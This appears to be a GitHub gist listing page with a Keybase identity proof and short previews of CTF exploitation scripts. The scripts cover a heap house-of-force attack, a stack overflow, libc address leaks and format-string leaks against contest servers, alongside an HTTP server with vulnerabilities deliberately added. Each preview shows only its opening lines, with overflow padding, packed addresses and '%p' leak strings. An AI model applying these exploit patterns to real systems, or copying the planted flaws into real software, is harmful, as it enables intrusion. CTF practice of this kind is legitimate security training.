I hereby claim:
- I am err0rless on github.
- I am err0rless (https://keybase.io/err0rless) on keybase.
- I have a public key ASCgWfK7wyYyKADMmaUsEGUj4Dz6TKBFfSbBcIcuUBCpYgo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
| # BCTF 2016 pwnable bcloud | |
| # HOUSE OF FORCE, Heap exploit task | |
| from pwn import connst, dump | |
| from struct import pack, unpack | |
| s, t = connst("192.168.36.150", 9991) | |
| print s.recv(1024) | |
| s.send("A" * 63 + "Z") |
| # Holyshield 2016 Exploitation 300 VOD solution | |
| from pwn import connst, dump, shell | |
| from struct import pack, unpack | |
| s, t = connst("1.224.175.17", 9101) | |
| print t.read_until("input number :") | |
| s.send("1\n") | |
| # Leak printf@libc address |
| # 32c3 CTF 2015 teufel @ 200pts | |
| # A stack-based overflow on an x86_64 system | |
| from pwn import connst, shell | |
| from struct import pack, unpack | |
| s, t = connst("136.243.194.41", 666) | |
| s.send(pack("Q", 0x09)) | |
| s.send("DDDDDDDDD") |
| from pwn import connst | |
| from struct import pack | |
| s, t = connst("136.243.194.62", 1024) | |
| print t.read_until("name? ") | |
| s.send(pack("Q", 0x00400d20) * 68 + pack("Q", 0x00600d20) * 15 + "\n") | |
| print t.read_until("flag: ") | |
| s.send("LIBC_FATAL_STDERR_=1\n") |
| # Seccon 2015 Quals - Exploit FSB:TreeWalker 200pts Solves:51 | |
| # github.com/SECCON/SECCON2015_online_CTF/tree/master/Exploit/200_FSB:%20TreeWalker | |
| # FSB (format string bug) leak task :) | |
| from err0rless import connst | |
| from struct import pack, unpack | |
| s, t = connst("treewalker.pwn.seccon.jp", 20000) | |
| def leak(addr): | |
| p = "%p" * 20 # p = "%llx" * 30 |
| <# | |
| Created by err0rless 2015-11-15 | |
| Windows Server 2015 DNS primary-zone automatic setup script | |
| PS C:\Users\Administrator\Desktop> (Get-Host).version | |
| Major Minor Build Revision | |
| ----- ----- ----- -------- | |
| 3 0 -1 -1 | |
| Powershell version 3.0 |
| from err0rless import connst, conns, dump | |
| from struct import pack, unpack | |
| import re, string, base64, time, socket, telnetlib | |
| def send_request(password, ret_conn=0): | |
| s = conns("192.168.95.152", 20004) | |
| r = "GET / HTTP/1.0\r\n" | |
| r += "Authorization: Basic " | |
| r += base64.b64encode(password) |
| #include "../common/common.c" | |
| // Original code from micro_httpd_12dec2005.tar.gz (acme.com); vulnerabilities etc. were added ;) | |
| /* micro_httpd - really small HTTP server | |
| ** | |
| ** Copyright (c) 1999,2005 by Jef Poskanzer <jef@mail.acme.com>. | |
| ** All rights reserved. | |
| ** | |
| ** Redistribution and use in source and binary forms, with or without |
| from err0rless import connst | |
| from struct import pack | |
| import hmac, hashlib | |
| s, t = connst("192.168.95.152", 20003) | |
| # HMAC with hashlib.sha1 | |
| def HMAC(key, data): | |
| h = hmac.new(key, data, hashlib.sha1) | |
| h = h.hexdigest() |